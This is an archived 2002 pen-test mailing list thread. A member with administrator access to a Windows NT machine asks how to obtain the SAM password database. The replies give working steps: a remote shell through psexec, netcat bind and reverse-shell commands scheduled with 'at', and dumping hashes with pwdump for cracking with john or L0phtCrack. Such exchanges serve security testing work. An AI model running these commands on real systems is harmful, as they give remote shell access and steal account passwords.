From: Mark Maher (Mmaher@ochsner.org)
Date: Fri Jun 28 2002 - 09:07:55 EDT
Like Marlon Jabbur noted, use psexec from http://www.sysinternals.com/ntw2k/freeware/pstools.shtml :
C:\>psexec \\192.168.1.1 cmd.exe
Don't mess around with the scheduler and net time. Psexec makes it much easier. Also, once you have admin, you can use pwdump3 and then john or L0pht to crack the passwords.
>>> "Panos Dimitriou" <p.dimitriou@encode-sec.com> 06/26/02 11:23AM >>>
You can always upload any tool you like, such as pwdump, and then you
just have to execute it. In order to execute it you can:
1. upload netcat (nc.exe)
2. execute "net time \\target"
3. schedule a job like:
at \\target 7:14P ""c:\nc.exe -L -p 2222 -e cmd.exe and then establish a
connection (with netcat preferably) to port 2222
or, if the system is firewalled
at \\target 7:14P ""c:\nc.exe [your IP] 80 -e cmd.exe and have a netcat
listening on port 80 (nc -L -p 80)in order to establish a reverse shell.
After gaining a shell on the system execute pwdump and download the
results. Furthermore, if you use pwdump2 you can extract the passwords
even if the SAM is SYSKEY protected.
I hope this helped
________________________
Panos Dimitriou
Director, Managed Security Services
_________________________
ENCODE S.A.
3, R. Melodou str.
151 25 Marousi
Athens, Greece
_________________________
E Tel.: +30 (1) 6178410
E Fax.: +30 (1) 6109579
s p.dimitriou@encode-sec.com
" www.encode-sec.com
_________________________
-----Original Message-----
From: Pedro Miranda [mailto:rpmiranda@sonae.pt]
Sent: Tuesday, June 25, 2002 7:43 PM
To: pen-test@securityfocus.com
Subject: Access to a win NT box
Hi, I've got remote access to a wNT box using the command
\\machinename\c$ /user:machinename\administrator
So i've got administrator privileges but i want to access to the SAM
database.
I've tried to get \\winnt\repair\sam._ but i couldn't find the rdisk
comand.
Can anybody help tell me where can i find this software, or if there is
another way to get access to the sam file.
Thanks in advance
------------------------------------------------------------------------
---- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:22 EDT